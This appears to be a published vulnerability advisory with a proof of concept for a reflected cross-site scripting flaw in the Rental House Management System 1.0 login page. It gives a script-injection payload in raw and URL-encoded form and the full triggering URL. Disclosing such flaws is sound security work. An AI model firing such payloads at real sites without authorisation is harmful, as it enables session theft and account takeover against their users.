Rental House Management System version 1.0 suffers from a cross site scripting vulnerability.
88286aba973c30c4ed728bf0bfbda07be1dff2ad877d862bd44fa5ae1b00f266
# Exploit Title: Rental House Management System - Reflected Cross-Site Scripting (XSS)
# Date: 25/03/2023
# Exploit Author: İsmail Can Durna
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/admin/rental_house_management_system.zip
# Version: 1
# Tested on: Windows/Linux
# Proof of Concept:
# 1- Rental House Management System
# 2- Go to http://localhost/rental_house/rental_house/login.php
# 3- Add payload to the URL, the XSS Payload:
/"><script>alert('XSS')</script>
Url encoded: /%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
# 4- XSS has been triggered.
# Go to this url "http://localhost/rental_house/rental_house/login.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E"
XSS will trigger.